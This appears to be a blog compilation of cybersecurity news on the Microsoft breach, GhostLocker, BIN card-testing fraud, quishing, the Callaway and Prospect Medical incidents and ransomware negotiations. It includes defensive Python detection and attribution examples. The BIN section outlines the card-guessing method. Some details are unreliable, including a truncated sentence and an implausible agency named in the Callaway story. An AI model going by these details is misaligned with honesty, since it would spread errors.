
Microsoft Source Code Heist: Russian Hackers Escalate Cyberwarfare

 


On Friday, Microsoft provided an update on the intrusion by hackers linked to Russian foreign intelligence. Using data stolen from corporate emails in January, the group regained access to Microsoft's systems, giving the foreign intelligence service a foothold in the tech giant's products, which are widely used in the national security establishment in the United States.

Analysts were alarmed by the disclosure and expressed concerns about whether the U.S. government can safely use Microsoft's digital services and infrastructure. Microsoft is one of the world's largest software companies and provides systems and services, including cloud computing, to the government.

Microsoft said that in recent weeks the hackers had used information stolen from its corporate email system to gain access to some of its internal systems and source code repositories. Source code is the nuts and bolts of a software program, the instructions that make it work.

Source code is therefore of great importance to corporations, and to the spies trying to penetrate them: with access to it, hackers may be able to mount follow-on attacks against other systems. In the first days of January, Microsoft announced that its cloud-based email system had been breached by the same hackers, days before another big tech company, Hewlett Packard Enterprise, announced that its cloud-based email system had also been breached.

Although the full scope and purpose of the hacking activity is unclear, experts say the group responsible has a history of conducting extensive intelligence-gathering campaigns for the Kremlin. Microsoft, which is still examining the extent of the breach, said the Russian state-sponsored threat actor may be trying to take advantage of the various secrets it found, including emails exchanged between Microsoft and its customers.

The company said it has contacted the affected customers directly, but it did not reveal what the secrets were or the extent of the compromise, and it is unclear what source code was accessed. Microsoft also said that it has increased its security investments and that the adversary ramped up its password spray attacks more than tenfold in February compared with the "amount of activity" observed earlier in the year.

Analysts who track Midnight Blizzard report that the group targets governments, diplomatic agencies, and non-governmental organizations. In its January statement, Microsoft said the group might have targeted it because of the company's extensive research into Midnight Blizzard's operations.

Since at least 2021, when the group was found to have been behind a series of cyberattacks that compromised a wide range of U.S. government agencies, Microsoft's threat intelligence team has been researching Nobelium and sharing its findings with the public. According to Microsoft, the persistent attempts to breach the company show that the threat actor has committed significant resources, coordination, and focus to the effort.

In the years since the 2020 hack, Russian hackers have continued to break into widely used tech companies as part of their espionage campaigns, which US officials and private experts agree reflects a persistent, significant commitment. An official blog post that accompanied Friday's SEC filing said the hackers may have assembled an inventory of potential targets, may now be planning to attack them, and may have enhanced their ability to do so with the information stolen from Microsoft.

Several high-profile cyberattacks against Microsoft have been attributed to lax cybersecurity operations, including the compromise of its Microsoft 365 (M365) cloud environment by the Chinese threat actor Storm-0558, the PrintNightmare vulnerabilities, the ProxyShell bugs, and the two zero-day Exchange Server vulnerabilities known as ProxyNotShell.

Microsoft's February Patch Tuesday update addressed an admin-to-kernel vulnerability in the AppLocker driver disclosed by Avast, six months after Microsoft accepted Avast's report. The North Korean Lazarus Group used the vulnerability to establish a kernel read/write primitive and install a rootkit on the system. In December 2023 the company replaced its long-time chief information security officer, Bret Arsenault, with Igor Tsyganskiy to address security concerns.

GhostLocker 2.0 Unleashes Cyber Haunting Spree in the Middle East, Africa, and Asia

 


Cybercriminals have developed a new version of the infamous GhostLocker ransomware and are using it against targets across the Middle East, Africa, and Asia. Two ransomware groups, GhostSec and Stormous, have joined forces to use GhostLocker 2.0 in double-extortion attacks on organizations in Lebanon, Israel, South Africa, Turkey, Egypt, India, Vietnam, and Thailand.

The attacks target technology companies, universities, manufacturing and transportation companies, and government organizations, whose data is rendered inaccessible by the file-encrypting malware. Victims are then pressed to pay for decryption keys that would allow them to recover the encrypted data.

According to researchers at Cisco Talos, who discovered the campaign, the attackers also threatened to release victims' sensitive data unless they paid to keep it hidden. Both groups have revamped their RaaS programs and introduced a new one called STMX_GhostLocker, which offers affiliates several options for distributing the ransomware.

GhostSec and Stormous announced their attacks on their Telegram channels as well as on the Stormous ransomware data-leak site. A Cisco Talos blog post released this week suggested that GhostSec was targeting Israel's industrial systems, critical infrastructure, and technology companies. Victims are believed to include the Israeli Ministry of Defense, but the group's motive appears to be profit rather than kinetic sabotage.

Conversations in the group's Telegram channel suggest that at least part of its motivation, at least initially, was to raise funds for hacktivists and threat actors. Curiously, GhostSec has adopted the same name as Ghost Security Group, a well-known hacktivist organization that targeted 'pro-Islamic State group' websites and carried out other cyberattacks, though there is no confirmation that the two are linked.

Following successful joint operations against Cuban ministries last July, the Stormous gang added the GhostLocker ransomware program to its existing StormousX program. GhostSec has also been attacking corporate websites, including those of a national railway company in Indonesia and an energy supplier in Canada.

Cisco Talos also reported that the group may be using its GhostPresser tool to conduct cross-site scripting (XSS) attacks against vulnerable websites. This week the group is also offering the GhostSec deep-scan tool suite it created, which would allow attackers to sweep potential targets' websites for ransomware implants.

The Python-based utility is advertised as letting users scan targeted websites for specific vulnerabilities, referenced by CVE number, although these functions are currently placeholders. In Cisco Talos' opinion, "the promise of functionality demonstrates a continuous evolution, which goes hand in hand with GhostSec's continuous development of tools for their arsenal." According to security researchers, the malware's developers also refer in their chats to "ongoing work" on "GhostLocker v3".

GhostLocker 2.0 encrypts files on the victim's computer with the extension .ghost, drops a ransom note, and demands payment to unlock them. Victims are warned that their compromised data will be publicly disclosed unless they contact the ransomware operators within a strict seven-day timeframe. Affiliates of the GhostLocker ransomware-as-a-service get a control panel that registers each attack on a dashboard and allows real-time monitoring.

The command-and-control server for GhostLocker 2.0 is geolocated in Moscow, as it was for earlier versions. Affiliates who pay gain access to a customizable ransomware builder, which lets them configure options such as the target directory for encryption. The ransomware exfiltrates and encrypts files with extensions such as .doc, .docx, .xls, and .xlsx, covering Word documents and Excel spreadsheets.

Unlike its Python-based predecessor, the latest iteration of GhostLocker is written in Go. Its functionality is otherwise similar to the previous version, with one notable change: the encryption key length has been doubled from 128 to 256 bits. In response to the campaign, Cisco Talos advises organizations to strengthen their defences through a comprehensive security approach that enables prompt detection of attacks.

This involves studying the tactics, techniques, and procedures (TTPs) employed by the GhostLocker group, as well as ensuring up-to-date detection signatures for the newest GhostLocker ransomware version. Cisco further recommends that organizations fortify their web servers with layered defence mechanisms, incorporating demilitarized zones (DMZs) to isolate public-facing systems. This is particularly pertinent given the GhostSec group's track record of conducting denial-of-service (DoS) attacks on victim websites. 

Despite these precautionary measures, the true impact of the recent GhostLocker attacks remains elusive. Cisco has underscored the uncertainty surrounding the number of potential victims affected. While some data has surfaced on the leak site, it remains challenging to ascertain its accuracy, including the extent of financial transactions, if any. As the cybersecurity landscape evolves, GhostLocker ransomware emerges as a persistent threat, underscoring the critical need for organizations to continuously enhance their security measures. 

The adoption of a defence-in-depth strategy, meticulous analysis of threat actors' TTPs, and regular updates to detection mechanisms are imperative in safeguarding against the ever-evolving tactics of malicious entities. The call for layered defence, including the implementation of DMZs for web servers, reinforces the proactive approach required to mitigate the risks associated with this sophisticated ransomware campaign.

‘BIN’ Attacks: Cybercriminals are Using Stolen ‘BIN’ Details for Card Fraud


While defenders are adopting newer technologies, cybercrime groups are also augmenting their tactics with more sophisticated tools.

The latest example is the "BIN attack," which has targeted small businesses. The tactic uses the Bank Identification Number (BIN) of a credit card as a starting point, allowing threat actors to test guessed card details by trial and error on unsuspecting e-commerce websites.

Behind the Scenes of the 'BIN' Attacks

In 2023 alone, payment card fraud amounted to $577 million, 16.5% more than in 2022. The Commonwealth Bank was among the victims when a Melbourne wholesaler faced a barrage of 13,500 declined e-commerce transactions in a month.

The incident, initially put down to a clerical error, turned out to be cybercrime that affected both businesses and consumers.

The cybercriminals first obtain the first six digits of a credit card, the Bank Identification Number (BIN). They then use trial and error to find which combinations of the remaining card digits, expiration dates, and security codes are accepted. The card details that work are verified through small, inconspicuous transactions to confirm they are genuine. Once verified, the compromised card numbers are either sold by the fraudsters or used in larger-scale fraudulent transactions.

Customer Accounts Compromised

Commonwealth Bank account holders, Bob Barrow and John Goodall, discovered that they were the targets of fraudulent activities. Despite having no online activity with their cards, they were astonished when they found out about the transactions made on their accounts. This made them question the security of their financial information.

Credit card numbers are less random and less limitless than one might believe. Of the sixteen digits on a card, the six-digit BIN leaves just ten to guess, and those follow a pattern. Because there are comparatively few options, cybercriminals can use automated methods to quickly guess valid combinations, which poses a serious threat to conventional security measures.

While the affected entities are expected to come up with more stringent safety measures, the responsibility does not lie solely with the banks. Financial institutions do not always conduct the transactions; as the card issuers, they are often victims themselves. The attacks emphasize the need for multi-layered safeguards, with companies using strong fraud prevention systems and security-focused payment processors for online shops, such as Stripe and Square. This matters because the aftermath of a BIN attack can drive a small firm into bankruptcy.
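On the merchant side, the trial-and-error pattern described above shows up as a burst of declined authorizations that all share one BIN, with many different card numbers and small amounts, sometimes followed by a lone approval on a card that "worked". The following is an added example, not from the article or any vendor, of detection logic run over constructed authorization-log records; the log format, the field names and the thresholds are assumptions, and the PANs are masked as a gateway would store them.

```python
"""Merchant-side detection of BIN (card-testing) attacks.

Added example for this article, not code from the original post. It scans
constructed authorization-log records of the kind an e-commerce back end or
payment gateway keeps and flags BINs whose decline burst looks like an
attacker guessing the remaining card digits by trial and error.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    bin6: str          # Bank Identification Number: first six digits of the PAN
    masked_pan: str    # e.g. "456789******0017"; full PANs are never stored
    approved: bool
    amount_cents: int


# Constructed sample log (assumed format):
# "<ISO timestamp> <masked PAN> <expiry MMYY> <APPROVED|DECLINED> <amount in cents>"
# Lines for BIN 456789 model a card-testing burst: ten low-value declines on
# ten different card numbers in seven minutes, then one approval (a "hit").
# Lines for BINs 411111 and 522222 model ordinary shop traffic.
SAMPLE_LOG = """\
2023-11-02T08:30:00 411111******4321 0925 APPROVED 4599
2023-11-02T08:45:00 411111******8765 0126 DECLINED 12999
2023-11-02T09:00:00 456789******0017 1224 DECLINED 100
2023-11-02T09:00:40 456789******0025 0125 DECLINED 100
2023-11-02T09:01:20 456789******0033 0325 DECLINED 100
2023-11-02T09:02:00 522222******1111 0826 APPROVED 2350
2023-11-02T09:02:10 456789******0041 0625 DECLINED 100
2023-11-02T09:03:00 456789******0059 0925 DECLINED 100
2023-11-02T09:03:50 456789******0067 1125 DECLINED 100
2023-11-02T09:04:40 456789******0075 0226 DECLINED 100
2023-11-02T09:05:00 411111******4321 0925 APPROVED 1999
2023-11-02T09:05:30 456789******0083 0426 DECLINED 100
2023-11-02T09:06:20 456789******0091 0726 DECLINED 100
2023-11-02T09:07:10 456789******0109 1026 DECLINED 100
2023-11-02T09:08:00 456789******0117 0126 APPROVED 100
2023-11-02T10:15:00 411111******2468 0327 APPROVED 8900
2023-11-02T11:00:00 411111******1357 0527 DECLINED 4500
"""


def parse_log(text: str) -> list:
    """Parse the assumed log format into AuthEvent records, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pan, _expiry, code, amount = line.split()
        events.append(AuthEvent(datetime.fromisoformat(ts), pan[:6], pan,
                                code == "APPROVED", int(amount)))
    return events


def detect_bin_attacks(events, window=timedelta(minutes=10),
                       min_declines=8, min_distinct_cards=5) -> dict:
    """Return {bin6: stats} for every BIN that, within any sliding window,
    has at least min_declines declines spread over at least
    min_distinct_cards different card numbers. For each flagged BIN the
    window with the most declines is reported, together with any cards the
    gateway approved inside it (candidates for blocking and issuer contact).
    """
    by_bin = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_bin[e.bin6].append(e)

    alerts = {}
    for bin6, evs in by_bin.items():
        win = deque()
        best = None
        for e in evs:
            win.append(e)
            while e.ts - win[0].ts > window:      # slide the window forward
                win.popleft()
            declined = [x for x in win if not x.approved]
            distinct = {x.masked_pan for x in declined}
            if len(declined) >= min_declines and len(distinct) >= min_distinct_cards:
                if best is None or len(declined) >= best["declines"]:
                    best = {
                        "window_start": win[0].ts,
                        "window_end": e.ts,
                        "declines": len(declined),
                        "distinct_cards": len(distinct),
                        # Small, uniform amounts are typical of probing.
                        "median_amount_cents": int(median(x.amount_cents for x in declined)),
                        "approved_cards": sorted(x.masked_pan for x in win if x.approved),
                    }
        if best is not None:
            alerts[bin6] = best
    return alerts


if __name__ == "__main__":
    for bin6, stats in detect_bin_attacks(parse_log(SAMPLE_LOG)).items():
        print(f"BIN {bin6}: {stats['declines']} declines on {stats['distinct_cards']} cards "
              f"between {stats['window_start']:%H:%M:%S} and {stats['window_end']:%H:%M:%S}; "
              f"approved during burst: {stats['approved_cards']}")
```

The thresholds are deliberately conservative for a small shop's traffic; a high-volume merchant would tune the window and counts against its normal decline rate, and would treat the approved cards in a flagged window as likely compromised rather than as good sales.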

Report: Retailers Face Challenges in Coping with Ransomware Attacks

 

In a disconcerting revelation, a recently released report suggests that retailers are increasingly outmatched in the ongoing battle against ransomware operators. The survey, conducted by cybersecurity firm Sophos, gathered the perspectives of 3,000 IT and cybersecurity leaders from small and medium-sized businesses (SMBs) and enterprises worldwide, including 355 respondents from the retail sector.

The findings are rather sobering, indicating that a mere 26% of retailers were successful in thwarting a ransomware attack before succumbing to having their valuable data encrypted. This figure represents a noticeable decline from the preceding year's 28%, and even more starkly from the 34% recorded two years prior.

Chester Wisniewski, the Director of Global Field CTO at Sophos, sounds a cautionary note, deeming the survey a resounding wake-up call for organizations within the retail industry. His message is clear: retailers must urgently fortify their security measures in the face of the escalating ransomware threat.

The report also sheds light on the protracted recovery process faced by victims who opt to meet the ransom demand. Among those who acquiesced, the median recovery cost, excluding the ransom payment itself, surged to four times that of those with a functional backup, reaching a staggering $3 million compared to $750,000. 

Approximately 43% of victims opted to pay the ransom, prompting Wisniewski to caution against shortcuts, underscoring the imperative of rebuilding systems to prevent cybercriminals from reaping the rewards of their malicious activities.

While there is a glimmer of optimism for retailers in the report - the percentage of firms targeted by ransomware threats dropped from 77% to 69% compared to the previous year - the recovery times have taken a hit. The proportion of companies able to recover in less than a day dwindled from 15% to a mere 9%, while those grappling with recovery periods exceeding a month increased from 17% to 21%.

Ransomware, as the report highlights, typically gains entry through the actions of unwitting employees, such as downloading malware or inadvertently providing attackers access to crucial endpoints. 

Consequently, the report underscores the critical importance of comprehensive employee education regarding the perils of cyberattacks. In addition to fostering employee awareness, safeguarding against ransomware necessitates strategic measures such as regular backups of critical systems and data, coupled with the implementation of robust endpoint protection services. The call to action is clear - retailers must fortify their cybersecurity defenses comprehensively to navigate the evolving threat landscape successfully.

Quishing Emerges as a Leading Cybersecurity Challenge

 


Researchers predict that cybercriminals will increasingly use email-based quishing attacks to steal data from users. Several quishing campaigns are known to have been large, long-running, and dynamic, judging by their attack cadence and by the variations in the lures and domains featured in their messages.

The recently released Global State of Mobile Phishing Report offers some sobering insights into the widespread use of mobile phishing attacks. It noted that over 50% of the personal devices used by a company's employees had been hacked every quarter, an astounding number.

Technology is constantly evolving to make users' personal and professional lives more convenient. One advancement that has made life easier for consumers is the Quick Response (QR) code, an easily scanned two-dimensional barcode that can share website URLs and contact information or be used to make payments.

Besides improving daily life, QR codes have also opened new avenues for cybercriminals to steal information. This form of phishing, known as quishing, poses a significant threat to individuals and organizations alike, and QR code phishing attacks have been on the rise for years.

Even though "quishing" sounds cute, it is a serious practice that has to be taken seriously. A typical attack generates a fake email with a QR code inserted into it and sends it to the target as a phishing email.

Hackers use the QR codes embedded in these emails to trick recipients into visiting malicious websites or downloading malware onto their devices. Such attacks usually rely on social engineering to exploit the trust that people place in email.

The Global State of Mobile Phishing Report has also published recent findings on the effectiveness of mobile phishing attacks: over half of a company's employees' devices are exposed to phishing every few weeks, and at least one-third of those users are not even aware that it is happening.

Additionally, there was a seven-fold increase in the number of QR code phishing reports in Q2 of 2022. Many industries are targeted by these attacks, including insurance, legal, financial, and healthcare. These industries are heavily regulated because of the sensitive and valuable nature of their data, which makes them attractive targets for cybercriminals, and they are easy to reach.

QR codes are increasingly appearing everywhere: in restaurants, on public transport, in commercials, on signs, walls, bathrooms, billboards and posters; companies even ship their products with QR codes so that consumers can access the manual on their phones.

Criminals are currently running quishing attacks mainly by sending targets a QR code via email. In many cases those emails are simply a call to action: users must verify their accounts within a specific time frame or their accounts will be locked or closed. The QR code arrives in an email opened on a desktop computer, and once the user scans it, it causes havoc.

QR code attacks are hard to detect with traditional email filtering, since there are no embedded links or malicious attachments to scan, and email filters are not designed to follow a QR code to its destination to look for malicious content. The attack also shifts the actual threat to another device, one that is less likely to be protected by corporate security software.

These attacks can be detected using artificial intelligence and image recognition technology. A fake QR code is usually not the only sign that an email is malicious, so AI-based detection also takes other signals into account, such as the sender's name, the content, and the size and placement of images, to determine whether a message is malicious. Barracuda Impersonation Protection employs these and other techniques to detect and prevent QR code scams.

Currently, many quishing attacks target individual consumers, but enterprises and their employees are also at risk. Researchers from HP and Abnormal Security found that email-based QR phishing campaigns like those they uncovered could be used to steal credentials or spread malware to business accounts.

Fraudulent QR Code Signs


Recipients should watch for the signs that a QR code is fraudulent. These include:

  • The destination website contains spelling errors, poor-quality images, or inadequate design.
  • The URL starts with HTTP rather than HTTPS.
  • Short URLs hide the true destination site.

Golfing Community Shaken as Callaway Data Breach Hits One Million Fans

 


At the start of August, Topgolf Callaway (Callaway) was hacked, exposing the sensitive account and personal information of over 1 million customers to the risk of identity theft. There are many manufacturers and retailers of sports equipment in the US, but Callaway is the leading brand of golf gear and accessories, including clubs, balls, bags, gloves, and hats.

With approximately $1.2 billion in revenue in the past year, the company has a presence in more than 70 countries and employs roughly 25,000 people. Its product line covers a variety of golf gear made by Callaway.

The company reported that over 1 million people were affected by the breach. Topgolf Callaway Brands Corp. has been alerting customers that the information of some users of its e-commerce websites was exposed in an "IT system incident" that began on August 1.

Last week the company sent a notification email to the victims explaining what had happened and what steps it was taking to address the issue. According to the email, an unknown malicious external party intruded into the company's e-commerce system on August 1, affecting the availability of some of the company's e-commerce services.

The exact date of the intrusion has not been disclosed. The breach affected users of several Callaway Golf sites, including Callaway Golf Preowned, Odyssey, and Ogio. The attackers stole sensitive user data, including full names, shipping addresses, e-mail addresses, phone numbers, order history, account passwords, and security questions.

According to the notice, no payment information, ID information, or Social Security Numbers (SSNs) were collected. The investigation found that the affected data comprises users' names, mailing addresses, email addresses, phone numbers, order history, account passwords, and answers to their security questions.

A police report was filed and the police were notified immediately. A total of 1,114,954 records of private information were exposed in the breach. Because the attackers stole passwords and security question answers,

A public notice about the breach was made on August 29th by the Maine Attorney General's office. Maine has strict rules concerning cyberattacks that compromise the privacy of any of its residents, of whom 2,219 were affected by the hack. 

No payment card data or government identification numbers, such as Social Security numbers, were breached. A company representative confirmed that the company does not store this information.

Security questions were disabled for a long period, and almost a month later passwords were forcibly reset: Callaway reset everyone's login credentials and required users to choose a new password at their next login. The Maine Division of Environmental Protection notified all affected residents by email on the day this was completed.

Customers regain access to their accounts once they have reset their passwords. Users are strongly advised to also change their passwords on any other websites where they used the same login information.

Topgolf Callaway has set up a dedicated toll-free incident response line to answer any questions or concerns, and detailed instructions are available on the company's website.

Although it is unclear whether the incident was a ransomware attack, the fact that many of the company's e-commerce services were affected makes that a strong possibility.

If it was a ransomware attack, no ransomware group has claimed it so far, nor has the data been offered for sale on the dark web. It is likely, however, that this information will surface somewhere on the dark web someday.

The stolen data could be used for identity theft and phishing attacks, but the company is taking proactive measures to protect its customers. To regain access, users are automatically directed to the "callawaygolf.com/reset-password" page, where they can find instructions for resetting their password.

Following the data theft, the company moved quickly to reset the passwords of all affected users. Users who reuse the same password across multiple websites or online services should stop doing so.

Passwords should combine alphanumeric and symbol characters, and using unique passwords minimizes credential-stuffing attacks. Callaway customers should be cautious when unknown senders ask them to share additional data and should treat such messages as potentially malicious.

Ransomware Vendetta: Rhysida Group Strikes Prospect Medical, Warns of Auctioning Stolen Data

 


Rhysida, an ever-evolving ransomware group, has claimed responsibility for the recent cyberattack on Prospect Medical Holdings, which hit hospitals and medical facilities in four states and forced the company to take its systems down earlier this month.

Prospect operates 16 hospitals in California, Connecticut, Pennsylvania, and Rhode Island, as well as more than 165 clinics and outpatient facilities across those states. According to Callow, ransomware has affected many US healthcare systems this year, including at least 53 hospitals under their control, and at least 20 of those organizations have had data stolen.

The Department of Health and Human Services issued an alert earlier this month about Rhysida, a ransomware-as-a-service group that first emerged in mid-May. The group is still in its infancy and lacks advanced features, as shown by plaintext strings in its code that reveal registry modification commands.

Rhysida has carried out major attacks on organizations in several sectors, including education, government, manufacturing, technology, and managed service providers. As part of its ongoing investigation, the Federal Bureau of Investigation has revealed that most of the data stolen from eleven victims was uploaded to the threat actor's data leak site between June and the beginning of August.

In its attack on Prospect Medical Holdings, the Rhysida ransomware group claims to have obtained 500,000 social security numbers, confidential corporate records, and patient records.

A ransom note was reportedly displayed on employee screens the day after the attack, which is believed to have occurred on August 3rd, warning that the network had been compromised and devices had been encrypted.

Rhysida claims to hold more than one terabyte of stolen data, along with an SQL database of more than 1.3 terabytes. In its dark web listing, the group offered to sell the data for 50 bitcoin, roughly $1.3 million.

BleepingComputer later established that the Rhysida ransomware gang was behind the attack, even though Prospect Medical Holdings (PMH) did not respond to questions about the incident. Current reports say PMH hospital networks, including CharterCare, have successfully restored their systems, while work continues to reinstate patient records as soon as possible.

Earlier this month, the Department of Health and Human Services (HHS) warned that Rhysida appeared to be responsible for recent attacks on healthcare organizations, and the group has claimed responsibility for the Prospect Medical attack. HHS describes Rhysida as a new ransomware-as-a-service (RaaS) group that emerged in May 2023.

According to an HHS official, the group uses phishing and Cobalt Strike to breach targets' networks, plant its payloads, and encrypt them. If the victim does not pay the ransom, the group threatens to release all of the exfiltrated data. HHS noted that Rhysida is still in its infancy and has developed few advanced features, as evidenced by its version name, Rhysida-0.1.

The ransomware also leaves PDF notes in every affected folder instructing victims to contact the group through its portal and pay in Bitcoin. Rhysida's victims span Western Europe, North and South America, and Australia.

The group primarily targets the education, government, manufacturing, technology, and managed services sectors. More recently, as the PMH attack shows, it has turned to the healthcare and public health sector, with significant impact on the healthcare industry. Rhysida is one of several ransomware gangs that have claimed credit for such attacks in the past, said Emily Phelps, director at Cyware.
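The footprint described above, a note dropped into every affected folder plus a large share of renamed files, is something a file-server monitor can check for. The following is an added example written for this page, not code from the article, HHS or any vendor; the note filename and the encrypted-file extension are hypothetical placeholders, since the article does not give Rhysida's real indicators, and the sample directory tree is constructed inside a temporary directory.

```python
import os
import tempfile

# Hypothetical indicators for this demonstration (assumed, not Rhysida's real note
# name or file extension): the note the ransomware drops into every folder it
# touches, and the extension it appends to files it has encrypted.
NOTE_NAME = "README_RESTORE.pdf"
ENC_EXT = ".locked"


def scan_tree(root, note_name=NOTE_NAME, enc_ext=ENC_EXT):
    """Walk a directory tree and count folders containing the note and files
    carrying the encrypted-file extension."""
    stats = {"dirs": 0, "note_dirs": 0, "files": 0, "enc_files": 0}
    for _path, _subdirs, filenames in os.walk(root):
        stats["dirs"] += 1
        if note_name in filenames:
            stats["note_dirs"] += 1
        for name in filenames:
            if name == note_name:
                continue  # the note itself is not a user file
            stats["files"] += 1
            if name.endswith(enc_ext):
                stats["enc_files"] += 1
    return stats


def is_mass_encryption(stats, min_note_dirs=3, min_enc_ratio=0.5):
    """One stray note is noise; the same note in several folders together with a
    large share of renamed files is the footprint of an encryption run."""
    if stats["note_dirs"] < min_note_dirs or stats["files"] == 0:
        return False
    return stats["enc_files"] / stats["files"] >= min_enc_ratio


def build_sample_tree(root, hit_dirs=3, clean_dirs=2):
    """Create a constructed sample: some folders hit by the ransomware, some untouched."""
    for i in range(hit_dirs):
        d = os.path.join(root, f"share{i}")
        os.makedirs(d)
        for j in range(2):
            open(os.path.join(d, f"report{j}.docx{ENC_EXT}"), "w").close()
        open(os.path.join(d, NOTE_NAME), "w").close()
    for i in range(clean_dirs):
        d = os.path.join(root, f"archive{i}")
        os.makedirs(d)
        open(os.path.join(d, f"notes{i}.txt"), "w").close()


def demo(hit_dirs=3, clean_dirs=2):
    """Build the sample tree in a temp directory, scan it and return the verdict."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root, hit_dirs, clean_dirs)
        stats = scan_tree(root)
    return stats, is_mass_encryption(stats)


if __name__ == "__main__":
    print(demo())
```

The two thresholds are the whole point: a single folder with a note does not trip the check, so a user who saved a PDF with an unlucky name does not page the on-call engineer, while three folders with the same note and a majority of renamed files does.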

Behind Closed Cyber Doors: 50 Ransomware Negotiations' Unexpected Insights

Cybersecurity experts usually recommend against negotiating with ransomware attackers. On December 30, 2020, one victim defied that conventional wisdom and opened talks with the group that had just encrypted its systems.

The victim typed the single word "Help?" into the attackers' chat portal, and one of the hackers responded with an offer to negotiate. During the exchange the hackers stated that they had encrypted the victim's network and data and had also downloaded internal documents and files. They demanded $8,500,000 for the key to unlock the encrypted files.

The negotiation then nearly collapsed over a misunderstanding: the hackers misread one of the victim's messages as a request to destroy the files rather than to hand over the decryption key. In the end the two sides settled on $450,000, a 94.7% reduction from the original $8,500,000 demand.

Details of ransomware incidents are usually kept out of the public domain for as long as possible. Valéry Marchive, a French journalist who specializes in cybersecurity, takes a different view: the cloak-and-dagger conversations between victims and criminal gangs offer valuable insight into how the gangs operate, and that insight can be turned into a weapon against them.

Marchive has been compiling a database of ransomware negotiation chats over the past few years and recently made it public in an effort to reduce ransomware attacks. A recent research report by Cyber Threat Intelligence Analyst Calvin So, based on that data, examines how stylometric analysis (essentially, the study of writing style) can identify patterns and individual actors from the text of the dialogue.
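To make the stylometric idea concrete, here is an added example, written for this page rather than taken from So's report or Marchive's archive. It builds a character-trigram profile for each known operator and attributes an unseen transcript to the closest profile by cosine similarity; the two operators ("alpha" and "bravo") and every chat line are constructed for the example.

```python
import math
from collections import Counter

# Constructed transcripts in the style of two hypothetical ransomware operators,
# "alpha" and "bravo". They are invented for this example and are not drawn from
# Marchive's archive or So's report.
KNOWN_CHATS = {
    "alpha": [
        "hi. we download all ur files and encrypt ur network. u pay 50 btc and u get decryptor. no games pls",
        "ur time is running. u pay now and we delete everything. dont waste our time pls",
    ],
    "bravo": [
        "Hello. Your network has been encrypted by our team. The price for the decryption tool is 50 BTC. Please respond promptly.",
        "Good day. We have reviewed your financial statements. The price is fair for a company of your size. We await your reply.",
    ],
}


def char_ngrams(text, n=3):
    """Count overlapping character n-grams. Case, spacing and punctuation are kept
    on purpose: capitalisation habits and abbreviations like 'ur' are the signal."""
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))


def build_profile(texts, n=3):
    """Merge the n-gram counts of every known message from one operator."""
    profile = Counter()
    for text in texts:
        profile.update(char_ngrams(text, n))
    return profile


def cosine(a, b):
    """Cosine similarity between two n-gram count vectors."""
    dot = sum(count * b[gram] for gram, count in a.items() if gram in b)
    norm_a = math.sqrt(sum(c * c for c in a.values()))
    norm_b = math.sqrt(sum(c * c for c in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def attribute(unknown_text, profiles, n=3):
    """Score an unseen transcript against every operator profile and return the
    best match with all scores, so an analyst can see how close the runner-up is."""
    query = char_ngrams(unknown_text, n)
    scores = {name: cosine(query, prof) for name, prof in profiles.items()}
    best = max(scores, key=scores.get)
    return best, scores


PROFILES = {name: build_profile(texts) for name, texts in KNOWN_CHATS.items()}

if __name__ == "__main__":
    for sample in (
        "hi. we have ur data. u pay 20 btc and u get decryptor and we delete files. no games pls",
        "Hello. We have downloaded your company data. The price is 20 BTC. Please respond promptly.",
    ):
        print(attribute(sample, PROFILES))
```

Character n-grams are deliberately chosen over word features: they survive typos and pick up punctuation and casing habits, which is what distinguishes an affiliate who writes "u pay now" from one who writes "Please respond promptly." On real transcripts the margin between the top two scores matters as much as the winner, which is why `attribute` returns all scores.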

So's analysis of 50 negotiation transcripts from Marchive's archive shows that victims who negotiate tend to pay far less than the initial demand. Across the sample there was a fair amount of back and forth, and on average victims paid only about half of the original demand (52.7%). Only one victim in the sample paid the full amount without negotiating.

In some cases the attackers adopted a strikingly professional, even congenial tone. They presented themselves as a security service that had exposed vulnerabilities in the victim's systems and was now billing for the work. Victims sometimes engaged in friendly banter with their attackers, an unusual dynamic given the circumstances.

There is No Set Deadline

The most common concession victims negotiate is an extended deadline. Hackers grant extensions freely as long as the victim appears willing to pay and keeps talking. Another recurring offer was a discount in exchange for paying quickly.

Hackers usually open with a short deadline, since they want the transaction completed as soon as possible, but they are willing to extend it as long as they feel progress is being made or believe the victim is in the process of obtaining funds.

The facade of civility conceals threats both implicit and explicit. When negotiations reach an impasse, hackers challenge their victims, taunt them, and issue ultimatums. Even though negotiating with ransomware hackers is generally not recommended, a better understanding of how these negotiations unfold provides valuable insight into how to combat ransomware attacks.

Avoid Dealing With the Devil

Even though the anonymous companies in these transcripts came away relatively unscathed, that should not be taken as a sign that you should negotiate with ransomware groups. Quite the opposite.

Although the sample set of transcripts did not show hackers reneging on their promise to release the hostage data once the victim paid, there is no guarantee that they did not keep a copy to sell to others.

That is only one of the risks of dealing with cybercriminals. As Max puts it, once the money has been delivered the attackers have no incentive to do anything further; as far as they are concerned, the job is done.

The best way to deny ransomware groups their payday is never to fall prey to them in the first place, which should go without saying. Most of the time, a few best practices keep individuals and companies out of the attackers' reach.

According to PCMag, the first step is a password policy requiring every password to be unique and at least 20 characters long. It is an easy, essential rule for every employee with a work account.

A similar policy should cover employees' personal accounts. A reliable password manager makes it practical to create and manage unique passwords across many accounts.

It is also critical that every device used on the work premises, including smartphones and tablets, has its security features enabled. Patch and update operating systems and software regularly, and perform regular backups of your data. For users who want additional protection from ransomware, a wide variety of apps can help.

FBI Alerts: Cybercriminals Exploiting Open-Source AI Programs with Ease

Unsurprisingly, criminals have been exploiting open-source generative AI programs for various malicious activities, including creating malware and conducting phishing attacks, as stated by the FBI.

In a recent call with journalists, the FBI highlighted how generative AI programs, highly popular in the tech industry, are also fueling cybercrime. Criminals are using these AI programs to refine and propagate scams, and even terrorists are consulting the technology to develop more powerful chemical attacks.

A senior FBI official stated that as AI models become more widely adopted and accessible, these cybercriminal trends are expected to increase.

Although the FBI did not disclose the specific AI models used by criminals, it said that hackers prefer free, customizable open-source models and also pay for private, hacker-developed AI programs circulating in the cybercriminal underworld.

